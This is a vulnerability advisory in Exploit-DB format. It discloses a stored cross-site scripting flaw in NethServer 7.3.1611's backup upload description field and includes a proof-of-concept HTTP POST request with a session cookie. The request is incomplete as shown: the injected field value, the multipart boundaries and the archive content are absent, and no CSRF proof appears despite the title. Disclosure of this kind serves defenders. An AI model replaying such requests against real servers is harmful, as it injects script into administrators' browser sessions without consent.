NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting

EDB-ID: 42579
Author: LiquidWorm
Published: 2017-08-28
Type: Webapps
Platform: JSON
Vulnerable App: N/A


Product web page:
Affected version: 7.3.1611-u1-x86_64

Summary: NethServer is an operating system for the Linux enthusiast,
designed for small offices and medium enterprises. It's simple, secure
and flexible.

Desc: NethServer suffers from an authenticated stored XSS vulnerability.
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
not properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.

Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
CentOS Linux 7.3.1611 (Core)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2017-5432
Advisory URL:



PoC request:

POST /en-US/BackupConfig/Upload.json HTTP/1.1
Connection: close
Content-Length: 15762
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2

Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
Content-Type: application/x-xz

[xz content omitted]
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"


Related Posts